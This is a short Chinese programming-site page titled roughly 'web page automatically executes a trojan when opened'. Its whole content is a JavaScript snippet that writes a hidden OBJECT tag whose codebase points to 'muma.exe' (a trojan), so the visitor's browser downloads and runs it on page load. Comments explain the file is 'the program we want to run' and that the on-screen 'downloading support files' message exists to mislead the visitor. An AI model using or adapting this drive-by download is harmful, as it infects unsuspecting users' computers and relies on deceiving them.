欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

网页打开后自动执行木马

程序员文章站 2022-07-04 22:07:15
  run_exe="
<script language="javascript"> 
run_exe="<object id=\"runit\" width=0 height=0 type=\"application/x-oleobject\"" 
run_exe+="codebase=\"muma.exe#version=1,1,1,1\">" 
//这里的muma.exe就是我们要运行的程序 
run_exe+="<param name=\"_version\" value=\"65536\">" 
run_exe+="</object>" 
run_exe+="<html><h1>等会......网页在下载支持的文件</h1></html>"; 
//这里是迷惑人的.你可以写其他任何东西. 
document.open(); 
document.clear(); 
document.writeln(run_exe); 
document.close(); 
</script>